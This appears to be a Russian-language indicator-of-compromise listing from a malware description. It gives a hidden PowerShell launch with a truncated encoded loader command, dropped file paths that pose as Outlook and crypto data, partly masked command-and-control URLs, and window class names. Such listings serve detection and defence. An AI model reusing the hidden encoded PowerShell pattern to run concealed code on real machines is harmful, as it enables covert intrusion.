Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Sta -Nop -Window Hidden -EncodedCommand cwB2ACAAbwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACkAOwBzAHYAIABkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0A...
- %LOCALAPPDATA%\microsoft\forms\frmdata64.dat
- %TEMP%\outlook logging\firstrun.log
- %WINDIR%\inf\outlook\outlperf.h
- %WINDIR%\inf\outlook\0009\outlperf.ini
- %APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\ff9e1b7b5e9e7033a1d3a2256afbeef5_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
- http://sk###rkslnc.com/en-us/index.html
- http://sk###rkslnc.com/en-us/docs.html
- http://sk###rkslnc.com/en-us/test.html
- DNS ASK sk###rkslnc.com
- ClassName: 'mspim_wnd32' WindowName: 'Microsoft Outlook'
- ClassName: 'rencat' WindowName: ''
- '%ProgramFiles%\microsoft office\office14\outlook.exe' -Embedding